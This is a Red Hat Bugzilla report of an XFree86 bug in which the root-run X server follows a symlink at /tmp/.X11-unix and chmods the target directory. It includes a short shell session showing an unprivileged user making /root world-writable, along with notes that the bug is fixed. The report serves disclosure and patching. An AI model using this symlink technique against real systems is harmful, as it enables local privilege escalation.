Red Hat Bugzilla – Bug 1816
XFree86 chmods directories symlinked from /tmp/.X11-unix
Last modified: 2008-05-01 11:37:49 EDT
Following a bugtraq report of NetBSD X11 chmoding /root to 1777 by following a symlink in /tmp I tried it under Linux. This is an XFree86 bug, and because it sets the permissions on /tmp/.X11-unix as root, the server will chmod any directory symlinked from that directory in /tmp. It has been confirmed on i386 platform but will likely effect all platforms. ********************** example ******************** bash$ id uid=543(tester) gid=100(users) groups=100(users) bash$ pwd /home/tester bash$ cd /tmp bash$ ls -la total 3 drwxrwxrwt 3 root root 1024 Mar 25 19:11 . drwxr-xr-x 18 root root 1024 Mar 24 10:50 .. bash$ ls -ld /root drwx------ 5 root root 1024 Mar 25 19:02 /root bash$ ln -sf /root .X11-unix bash$ ls -l .X11-unix lrwxrwxrwx 1 tester users 5 Mar 25 19:47 .X11-unix -> /root bash$ startx (X output removed) ^C waiting for X server to shut down bash$ ls -ld /root drwxrwxrwt 5 root root 1024 Mar 25 19:47 /root ******************** end example ************************* I have also submitted this to xfree86@xfree86.org
fixed in XFree86-3.3.3.1-31 and later.
We will be putting out a fix for XFree86 on Red Hat 4.x and 5.x later today, in addition to the fixed package which exists in RawHide right now.